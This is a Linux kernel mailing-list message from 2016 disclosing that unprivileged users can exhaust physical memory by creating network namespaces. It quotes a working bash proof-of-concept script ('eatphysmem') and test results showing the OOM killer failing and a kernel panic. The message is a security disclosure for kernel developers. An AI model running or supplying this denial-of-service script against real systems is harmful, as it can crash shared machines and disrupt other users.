From mboxrd@z Thu Jan 1 00:00:00 1970 From: yumkam@gmail.com (Yuriy M. Kaminskiy) Subject: Re: userns, netns, and quick physical memory consumption by unprivileged user Date: Fri, 11 Mar 2016 18:06:59 +0300 Message-ID: References: Mime-Version: 1.0 Content-Type: text/plain Cc: containers@lists.osdl.org, linux-kernel@vger.kernel.org To: netdev@vger.kernel.org Return-path: Received: from plane.gmane.org ([80.91.229.3]:38321 "EHLO plane.gmane.org" rhost-flags-OK-OK-OK-OK) by vger.kernel.org with ESMTP id S1752628AbcCKPHg (ORCPT ); Fri, 11 Mar 2016 10:07:36 -0500 Received: from list by plane.gmane.org with local (Exim 4.69) (envelope-from ) id 1aeOf2-00078O-AN for netdev@vger.kernel.org; Fri, 11 Mar 2016 16:07:28 +0100 Received: from ppp37-190-56-84.pppoe.spdop.ru ([37.190.56.84]) by main.gmane.org with esmtp (Gmexim 0.1 (Debian)) id 1AlnuQ-0007hv-00 for ; Fri, 11 Mar 2016 16:07:28 +0100 Received: from yumkam by ppp37-190-56-84.pppoe.spdop.ru with local (Gmexim 0.1 (Debian)) id 1AlnuQ-0007hv-00 for ; Fri, 11 Mar 2016 16:07:28 +0100 Sender: netdev-owner@vger.kernel.org List-ID: ping (+ more test results at bottom) On Wed, 02 Mar 2016, I wrote: > While looking at CVE-2016-2847, I remembered about infamous > nf_conntrack: falling back to vmalloc > message, that was often triggered by network namespace creation (message > was removed recently, but it changed nothing with underlying problem). > > So, how about something like this: > > $ cat << EOF >> eatphysmem > #!/bin/bash -xe > fd=6 > d="`mktemp -d /tmp/eatmemXXXXXXXXX`" > cd "$d" > rule="iptables -A INPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT" > # rule="$rule;$rule" > # ... just because we can; same with any number of ip li/ro/ru/etc > while :; do > let fd=fd+1 > [ ! -e /proc/$$/fd/$fd ] || continue > mkfifo f1 f2 > unshare -rn sh -xec "echo foo >f1;ip li se lo up; $rule;read r pid=$! > read r eval "exec $fd echo bar >f2 > wait > rm f2 f1 > free > sleep 0.1s > done > sleep inf > EOF > $ chmod a+x eatphysmem; unshare -rpf --mount-proc ./eatphysmem > ? > > You can easily eat 0.5M physical memory per netns (conntrack hash table > (hashsize*sizeof(list_head))) and more, and pin them to single process > with opened netns fds. > What can stop it? > ulimit? What is ulimit? Conntrack knows nothing about them. > Ah-yeah, `ulimit -n`? 64k. 64k*512k = 32G. Per process. Oh-uh. > OOM killer? But this is not this process memory; if any, it will be > killed last. > (I wonder, if memcg can tackle it; probably yes; but how many people > have it configured?). I tested in vm with kernel 4.4.2 (from user account, with ulimit -v 32768); as expected, it quickly eaten all memory, OOM killer went berserk and killed even systemd-journald and systemd-udevd, but left this process living (and hogging all physical memory; also note that swap was enabled - and mostly remained unused). And also tried with memcg: t=/sys/fs/cgroup/memory/test1;mkdir $t;echo 0 >$t/tasks; echo 48M >$t/memory.limit_in_bytes; su testuser [...] and it has not helped at all (rather opposite, it ended up with killed init and kernel panic; well, later is pure (un)luck; but point is, memcg apparently *CANNOT* curb net/ns allocations). BTW, all those hash/conntrack/etc default sizes was calculated from physical memory size in assumption there will be only *one* instance of those tables. Obviously, introduction of network namespaces (and especially unprivileged user-ns) thrown this assumption in the window (and here comes that "falling back to vmalloc" message again; in pre-netns world, those tables were allocated *once* on early system startup, with typically plenty of free and unfragmented memory).